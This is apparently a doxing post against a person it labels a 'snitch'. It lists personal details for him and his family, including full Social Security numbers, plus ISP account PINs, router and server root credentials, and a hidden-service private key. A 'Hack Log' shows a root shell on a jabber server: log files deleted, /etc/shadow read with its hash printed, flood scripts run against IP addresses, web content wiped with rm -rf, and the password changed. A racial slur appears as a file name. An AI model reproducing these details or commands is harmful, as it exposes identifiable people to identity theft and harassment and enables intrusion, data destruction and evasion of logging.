Name Blake Corman Phone 615-636-6881 Cell Verizon Address 5148 Brookst

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
Name: Blake Corman
Phone: 615-636-6881 - Cell, Verizon
Address: 5148 Brookstone Ct, Antioch, TN 37013
Emails:
- zzirblake@gmail.com
- zzirblake@yahoo.com
Skype: iquithacking
Jabber: ctn-0452-9@jabber.ccc.de
Occupation: Snitch
============================================================================
Mother: Rickie Lynn Corman
DOB: 06/14/1972
SSN: 405-27-4370
Phone: 615-641-1120 - Landline, TDS
Address: 5148 Brookstone Ct, Antioch, TN 37013
Previous Addresses:
250 Lake Forest Dr, La Vergne, TN 37086
1308 Crystal Spring, Ln Hermitage, TN 37076
============================================================================
Father: David Brian Corman
DOB: 03/23/1970
SSN: 369-86-2932
Previous Phones:
313-434-7544 - Cell, AT&T
734-316-0635 - Landline, ACD
734-434-7553 - Landline, AT&T
313-482-2132 - Landline, AT&T
Address: 5148 Brookstone Ct, Antioch, TN 37013
Previous Addresses:
250 Lake Forest Dr, La Vergne, TN 37086
1308 Crystal Spring, Ln Hermitage, TN 37076
211 N Adams St, Ypsilanti, MI 48197
5319 Nolensville Pike, Apt B301, Nashville, TN 37211
111 N Adams St, Apt 3, Ypsilanti, MI 48197
Emails:
- dbcorman@gmail.com
- dcorman@police.nashville.org
- david.corman@nashville.gov
- corman@mail.com
- daricked@aol.com
============================================================================
Brother: Bailey Corman
Phone: 615-473-8157 - Cell, Sprint
Address: 5148 Brookstone Ct, Antioch, TN 37013
Email: baileycorman@gmail.com
============================================================================
TDS Telecom:
IP: 96.61.170.120
Name on file: Rickie Corman
DOB on file: 06/14/1972
SSN on file: XXX-XX-4370
Phone on file: 615-641-1120 - Landline, TDS
Address on file: 5148 Brookstone Ct, Antioch, TN 37013
Emails:
- rcorman@tds.net
- baileycorman@tds.net
- blakecorman@tds.net
- dcorman@tds.net
- paulsprideride@tds.net
Account #: 0010887518
PIN: 5283
============================================================================
Router Login:
IP: 96.61.170.120
Port: 4567
Username: admin
Password: password
======================================
MAC Addresses:
- E0-46-9A-B5-4F-04
- 78-AC-C0-54-DB-5D
============================================================================
Server:
IP: 37.139.10.131
User: root
Password: on8o0lx75r
Hostname: jabber - toplel
Hack Log:
root@jabber:~# uname -a; id
Linux jabber.ccc.de 3.2.0-24-virtual #37-Ubuntu SMP Wed Apr 25 12:51:49 UTC 2012 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
root@jabber:~# ls
archey-0.2.8.deb nigger.py nigger.py.save scripts shallot t tor
root@jabber:~# ls -la
total 64
drwx------ 7 root root 4096 Nov 9 04:50 .
drwxr-xr-x 23 root root 4096 Nov 9 04:43 ..
-rw-r--r-- 1 root root 6438 Oct 7 2010 archey-0.2.8.deb
-rw------- 1 root root 3606 Nov 9 04:40 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwx------ 2 root root 4096 Dec 20 2012 .cache
-rw------- 1 root root 7 Nov 9 04:54 .nano_history
-rw-r--r-- 1 root root 547 Nov 9 04:35 nigger.py
-rw-r--r-- 1 root root 1101 Nov 9 04:40 nigger.py.save
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwxr-xr-x 2 root root 4096 Nov 9 04:40 scripts
drwxr-xr-x 2 root root 4096 Nov 9 04:50 shallot
drwxr-xr-x 2 root root 4096 Dec 20 2012 .ssh
-rw-r--r-- 1 root root 722 Nov 3 02:38 t
drwxr-xr-x 5 root root 4096 Nov 9 04:48 tor
root@jabber:~# cat .bash_history
cd /var/log
ll
rm /var/log/dmesg
rm /var/log/dmesg.0
last
ll
rm /var/log/auth.log
rm /var/log/boot.log
rm /var/log/kern.log
ll
cat syslog
rm /var/log/syslog
ll
touch wtmp
ls /home/
ls /opt/
cd
ll
cat .profile
ll
cat .bash_history
rm .bash_history
ll
ll .cache/
df
ls /usr/local/
cat /etc/passwd
cat /etc/shadow
poweroff
nano /etc/rc.local
shutdown -h now
perl
nano
perl t 50.154.236.177 80 100
perl t 50.154.236.177 80 10
logout
perl t 184.147.34.17 80 255
perl t 184.147.34.17 80 2550
clear
sudo apt-get install lighttpd
clear
install.c
clear
bash install.c
clear
compile # gcc install.c -o install.c
gcc install.c -o install.c
./install.c
sudo ./install.c
clear
python
php
apt-get install php
php5
clear
python phpkit.py odd.php
apt-get install python-requests
python phpkit.py odd.php
clear
passwd
dir
cd home
cd /home
dir
last
logout
cd /var/www
wget http://thebest404pageever.com/swf/rainbowchikkunz.swf
dir
loogut
logout
sudo apt-get install php
php -v
ubuntu too?
yes lol i chose ubuntu i could have done centods is that better
sudo apt-get php
sudo apt-get php5
sudo apt-get install php5
service phph stop
service php stpo
service php stop
service php5 stop
service php5 start
sudo /etc/init.d/apache2 restart
oh wait
sudo apt-get install php5-fpm php5
sudo apt-get install nano
nano /etc/php5/fpm/php.ini
nano /etc/lighttpd/conf-available/15-fastcgi-php.conf
lighttpd-enable-mod fastcgi
lighttpd-enable-mod fastcgi-php
/etc/init.d/lighttpd
/etc/init.d/lighttpd restart
/etc/init.d/lighttpd start
/etc/inti.d/lighttpd status
/etc/init.d/lighttpd tsatus
/etc/inti.d/lighttpd status
/etc/init.d/lighttpd status
./lighttpd
lighttpd
lighttpd -f
start lighttpd
/etc/init.d/lighttpd start
#/etc/init.d/lighttpd start
pkill lighttpd
/etc/init.d/lighttpd start
sudo service lighttpd force-reload
find
find lighttpd
lighttpd -t -f /etc/lighttpd/lighttpd.conf
systemctl
sudo apt-get remove lighttpd
sudo apt-get install lighttpd
sudo apt-get remove php5
/etc/init.d/lighttpd start
sudo apt-get remove php5-fpm fpm
sudo apt-get remove php5-fpm php5
nano /etc/lighttpd/conf-available/15-fastcgi-php.conf
lighttpd-disable-mod fastcgi
lighttpd-disable-mod fastcgi-php
/etc/init.d/lighttpd restart
sudo apt-get install lighttpd php5-cgi
sudo lightly-enable-mod fastcgi
sudo lightly-eanble-mod fastcgi
sudo apt-get remove lighttpd php5-cgi
sudo apt-get install php5-cgi
sudo lightppd-enable-mod fastcgi fastcgi-php
sudo lighttpd-enable-mod fatcgi fastcgi-php
lighttpd-enable-mod fastcgi fastchi-pgp
sudo apt-get remove php5-cgi
service lighttpd restart
/etc/init.d/lighttpd restart
sudo apt-get install lighttdp
sudo apt-get install lighttpd php5-cgi
sudo lighttpd-enable-mod fastcgi fastcgi-php
sudo service lighttpd reload
logout
ls
sudo apt-get install archey
sudo apt-get update
sudo apt-get dist update
sudo apt-get install archey
sudo apt-get install screenfetch
sudo apt-get install lsb-release scrot
wget http://github.com/downloads/djmelik/archey/archey-0.2.8.deb
sudo dpkg -i archey-0.2.8.deb
archey
ls
cat .bash_history
cd /var/www/
ls
nano index.html
cd
rm -rf
ls
cd ../
ls
cd usr
cd share
ls
cd
apache2
ls
cd /usr/share/vum
cd /usr/share/vm
cd /usr/share/vim
ls
cd
ls
mkdir scripts
ls scripts
cd scripts
ls
touch nigger.py
vi nigger.ph
vi nigger.py
nano nigger.py
ls
cd
nano nigger.py
ls
cd scripts
ls
nano nigger.py
ls
cd
nano nigger.py
cd scripts
nano nigger.py
cd
mkdir tor
cd tor
wget https://www.torproject.org/dist/tor-0.2.3.25.tar.gz
ls
tar -zxvf tor-0.2.3.25.tar.gz
ls
cd tor-0.2.3.25
root@jabber:~/tor# ls
./configure && make && src/or/tor
cd
screen tor
sudo apt-get install screen
root@jabber:~# cat .nano_history
fix_
root@jabber:~# w
04:59:24 up 3 days, 23:57, 2 users, load average: 0.00, 0.05, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 de1x.mullvad.net 04:40 0.00s 0.41s 0.41s -bash
root pts/1 h96-61-170-120.l 04:34 20:30 0.13s 0.13s -bash
root@jabber:~# lastlog
Username Port From Latest
root pts/0 de1x.mullvad.net Sat Nov 9 04:40:34 +0000 2013
daemon **Never logged in**
bin **Never logged in**
sys **Never logged in**
sync **Never logged in**
games **Never logged in**
man **Never logged in**
lp **Never logged in**
mail **Never logged in**
news **Never logged in**
uucp **Never logged in**
proxy **Never logged in**
www-data **Never logged in**
backup **Never logged in**
list **Never logged in**
irc **Never logged in**
gnats **Never logged in**
nobody **Never logged in**
libuuid **Never logged in**
syslog **Never logged in**
messagebus **Never logged in**
sshd **Never logged in**
debian-tor **Never logged in**
root@jabber:~# ls /home
root@jabber:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
debian-tor:x:104:107::/var/lib/tor:/bin/bash
root:$6$d8GR5I0Z$lnEImAQ9yE0EenFupDNOScIY7WW7Iv8DLofmHrInDwvmzc.VXOZjwkLVnys6Vzmq427Z66jVRwRRx.2d4knQ31:16014:0:99999:7:::
daemon:*:15456:0:99999:7:::
bin:*:15456:0:99999:7:::
sys:*:15456:0:99999:7:::
sync:*:15456:0:99999:7:::
games:*:15456:0:99999:7:::
man:*:15456:0:99999:7:::
lp:*:15456:0:99999:7:::
mail:*:15456:0:99999:7:::
news:*:15456:0:99999:7:::
uucp:*:15456:0:99999:7:::
proxy:*:15456:0:99999:7:::
www-data:*:15456:0:99999:7:::
backup:*:15456:0:99999:7:::
list:*:15456:0:99999:7:::
irc:*:15456:0:99999:7:::
gnats:*:15456:0:99999:7:::
nobody:*:15456:0:99999:7:::
libuuid:!:15456:0:99999:7:::
syslog:*:15456:0:99999:7:::
messagebus:*:15456:0:99999:7:::
sshd:*:15456:0:99999:7:::
debian-tor:*:16018:0:99999:7:::
root@jabber:~# ls /var/www
cortana.gif dox freakyfuck.png index.html lol lol2 Planewalker.ttf rainbowchikkunz.swf screencaps
root@jabber:/var/www# rm -rf *
root@jabber:/var/www# ls -a
. ..
root@jabber:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@jabber:~#
============================================================================
Hidden Service Hostname: tracetijr5rtklp5.onion
- Private Key:
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDRfrOp4979f5TM4zRx2aF5TV/XLXfPKsx+8aV+i4UFQoI76wxa
sqtCqwVWAbWWGgBvvzPcup9rdYfbuR/BS1vkjk8G6LWH1GieyUPF7dYbj4qhoE9A
ydjyRGj/1fj49lfcnoq4Dl2R2R+h/7iUhHHguoZ3l509hriI5Tw9esaNMwIEAeT4
LQKBgF/tSctpQ+6Yakbz8Q/6Rs5idpb1JSqtcplTPERQffsFxueLi7bzYLaEp0Hc
PicdEd7F6sU/eX/PcHr9zaKdWjIchdffokwew/jEtdGoRtffQHYXW8GZJvE1Cdw3
0kI9BcJrQOS0LWXK01uccE3pNzMOv2W8uvxXKB1iVi1jHaXhAkEA7d4Ibkk6HKhz
5aIoF7Cwng2/ZqUZG6PQDQnub87bgLMwBhYf3AQK+sIkquBWxikSx4HDcC+60y5O
Z/QwacCPHwJBAOF2+73SY7vUZ+bNu/WqWNUBBCji5tf3VYTH9MiIbvYkIs2uwsu0
mIM0MuHifVbGa0ZaKUSE+hAeD76wcwGbw20CQQDc7zrAHw+YU+3Ou29QwlsZbF8u
IiivrOYOrBDfJLT9pvGAyE9DNmmR9n1ccKwgEpvRk24EFp45VRq0tjlS1gt/AkAd
SGtHaug3UWMXKq6HyU9IReT3Sgk9F9VqU22G2Su1dBkhMrAkAtsL1OvSKSHAmle0
xnBbwvvEe7G+oooON2CJAkEAheANUGX2fX8xlTDgLK0Z6IXoxC4/ywFOip9+CFAk
xxVVHkqPoOXeO7+/bmMJ58KQAeDX4jezkFjjPyuUVpPpUg==
-----END RSA PRIVATE KEY-----
============================================================================
~james, http://imgur.com/a/aGKa6